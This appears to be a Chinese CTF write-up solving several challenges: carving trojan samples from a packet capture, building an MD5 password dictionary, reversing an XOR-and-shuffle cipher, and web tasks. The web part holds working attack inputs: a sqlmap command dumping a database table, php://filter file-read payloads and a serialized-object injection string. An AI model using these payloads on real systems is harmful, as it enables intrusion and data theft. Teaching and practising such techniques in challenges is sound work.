- 根据压缩包注释,猜测密码的字符集为 01,长度 `1-9`,爆破得到 flag
`foremost` 分离文件,得到一个 pdf,直接 `Ctrl+A`、`Ctrl+C`
- 直接分离文件,得到带有注释的压缩包
- password is (md5(virus_file) + lhost_ip)
- 存在大量ELF木马文件
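from pathlib import Path

# Carve fixed-size samples out of the capture at known byte offsets.
# The original hex-encoded the whole capture and sliced 33792 hex characters
# per sample; slicing the raw bytes gives the same 16896-byte windows without
# doubling the memory footprint.
CHUNK_SIZE = 33792 // 2

capture = Path("hacker_traffic.pcapng").read_bytes()

# Byte offsets of each sample inside the capture.
# NOTE(review): how these offsets were located is not shown on the page —
# presumably by searching the capture for the ELF header.
b = [16055, 55019, 92151, 129283, 166415, 203547, 240679, 277811, 314943, 352075, 389207, 426339, 463471, 500603, 537735, 574867, 611999, 649131, 686263, 723395, 760527, 797659, 839291, 876423, 913555, 950687, 987819, 1024951, 1062083, 1099215, 1136347, 1173479, 1210611, 1247743, 1284875, 1322007, 1359139, 1396271, 1433403, 1470535, 1507667, 1544799, 1581931, 1619063, 1656195, 1693327, 1730459, 1767591, 1804723, 1841855, 1878987, 1916119, 1953251, 1990383, 2027515, 2064647, 2101779, 2138911, 2176043, 2213175, 2250307, 2287567, 2324699, 2361959, 2399091, 2436223, 2473355, 2510487, 2547619, 2584751, 2621883, 2659015, 2696147, 2733279, 2770411, 2807543, 2844675, 2881807, 2918939, 2956071, 2993203, 3030335, 3067467, 3104599, 3141731, 3178863, 3215995, 3253127, 3290259, 3327391, 3364523, 3401655, 3438787, 3475919, 3513051, 3550183, 3587315, 3624447, 3661579, 3698711]

# The original assumed test/ already existed; create it so the run does not
# fail on the first write.
out_dir = Path("test")
out_dir.mkdir(exist_ok=True)

for i in b:
    # write_bytes() opens and closes the handle; the original left every
    # output file to be closed by the garbage collector.
    (out_dir / str(i)).write_bytes(capture[i:i + CHUNK_SIZE])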
- 发现一个 ip 地址,运行一下抓个包,判断此地址就是 `lhost`
- 接下来算 MD5,发现值不对:上面的脚本按固定长度截取(每个文件 33792 个十六进制字符,即 16896 字节),结尾可能带有多余的数据,所以写个脚本对每个可能的截断长度各算一次 MD5,生成字典
| from hashlib import md5 |
| |
| |
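# Build a candidate-password list for the archive: per the archive comment the
# password is md5(virus_file) + lhost_ip, and the carved sample may carry
# trailing bytes, so hash every prefix of it.
with open('2287567', 'rb') as sample:
    a = sample.read()

with open('test.txt', 'a') as file:
    for i in range(len(a)):
        # Drop i trailing bytes. The original wrote a[:-i], which is an empty
        # slice at i == 0, so the untrimmed file was never hashed and the
        # digest of b'' was emitted in its place.
        file.write(md5(a[:len(a) - i]).hexdigest() + '192.168.3.201\n')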
| from flag import secret |
| # Masked placeholder — presumably a dotted-quad IPv4 string in the real challenge (TODO confirm). |
| # This value is the only input to both random.seed() calls in encrypt_flag(). |
| key = "x.x.x.x" |
| |
| |
def encrypt_flag(flag, key):
    """Obfuscate the first 38 characters of *flag* and return them as base64.

    The PRNG is seeded with *key*, a shuffled index table over 0..37 picks
    the output order of the characters, the PRNG is re-seeded with the same
    *key*, and one byte drawn from it is XORed into every character.

    Both the permutation and the XOR byte are therefore a pure function of
    *key*: whoever knows *key* can regenerate them. The XOR byte has only
    256 possible values, and the shuffle moves characters without changing
    which characters are present.
    """
    random.seed(key)
    order = list(range(0, 38))
    random.shuffle(order)

    # Output position n holds the character that was at input index order[n].
    permuted = [flag[pos] for pos in order]
    codes = list(map(ord, permuted))

    # Same seed again: the mask depends on nothing but `key`.
    random.seed(key)
    mask = random.randint(0, 255)

    masked = bytes(code ^ mask for code in codes)
    return base64.b64encode(masked).decode("ascii")
| # NOTE(review): `flag` is not bound anywhere in this excerpt (the only import shown is `secret`), |
| # and `random` / `base64` are not imported here either — presumably trimmed from the published source. |
| print(encrypt_flag(flag, key)) |
| |
| import base64 |
| |
def decrypt(t):
    """Undo the challenge's XOR-and-shuffle encoding and print the plaintext.

    *t* is the base64 ciphertext. After decoding, each character is XORed
    with the fixed byte 96, and the character at position i is written back
    to index table[i], which reverses an encoder that placed input index
    table[i] at output position i.

    NOTE(review): 96 and the table are hard-coded; presumably they were
    obtained by re-running random.seed(key) with the recovered key — the
    page does not show that step.
    """
    xor_key = 96
    table = [25, 28, 7, 24, 5, 0, 33, 21, 1, 31, 29, 2, 18, 27, 19, 13, 22, 9, 30, 10, 3, 11, 35, 15, 20, 16, 4, 23, 37, 36, 17, 32, 6, 34, 8, 26, 14, 12]

    text = base64.b64decode(t).decode("ascii")
    unmasked = [chr(ord(ch) ^ xor_key) for ch in text]

    # Start from placeholder integers; every slot is overwritten below.
    slots = list(range(38))
    for position, target in enumerate(table):
        slots[target] = unmasked[position]

    print("".join(slots))
| |
| |
| # Ciphertext to recover (presumably the string the challenge printed from encrypt_flag). |
| # base64.b64decode accepts bytes or an ASCII str, so the .encode() is optional. |
| decrypt("VFVWU1kGBgIMUlMBVFcBBgRRBFAHVFBVUFkbUB0DAQMEBVIGAlE=".encode()) |
| # sqlmap against the challenge login form: --data supplies the POST body, -D / -T select database `ctf` and table `f111`, --dump reads its rows, --batch accepts the default answer to every prompt. |
| # NOTE(review): that this dump succeeds implies login.php builds its SQL from the POST fields; binding them as parameters (prepared statements) in login.php would close it. |
| python sqlmap.py -u http://62be1f5b518e59a9.node.nsctf.cn/login.php --data="username=admin&password=admin" -D ctf -T f111 --dump --batch |
| <!-- |
| // Challenge source as shown inside an HTML comment; the flag value is masked. |
| $flag = "***********"; |
| // Gate 1: parameters a and b must both be present. c and d are not checked here. |
| if(!isset($_GET['a']) or !isset($_GET['b'])) |
| { |
| die("NONONO"); |
| } |
| // Gate 2: the content read from the request-supplied location a must be exactly "flag". |
| // The location comes straight from the query string; nothing here restricts it to a fixed path. |
| if(file_get_contents($_GET['a'])!== "flag") |
| { |
| die("NONONO"); |
| } |
| // Gate 3: the content read from location b must equal parameter c (strict comparison). |
| // c is read without an isset() check, unlike a and b. |
| if(file_get_contents($_GET['b'])!==$_GET['c']) |
| { |
| die("NONONO"); |
| } |
| // File-inclusion sink: the included path is taken directly from parameter d, |
| // with no allowlist or directory restriction visible in this excerpt. |
| // NOTE(review): mapping a fixed set of names to files server-side would remove the request-chosen path. |
| if(isset($_GET['d'])) |
| { |
| include($_GET['d']); |
| }--> |
- 读取 `route.php`
- read=php://filter/read=convert.base64-encode/resource=route.php&input=1
- read=php://filter/read=convert.base64-encode/resource=h1nt.php&input=1
- read=h1nt.php&input=O:4:"test":1:{s:8:"position";s:57:"php://filter/read=convert.base64-encode/resource=f14g.php";}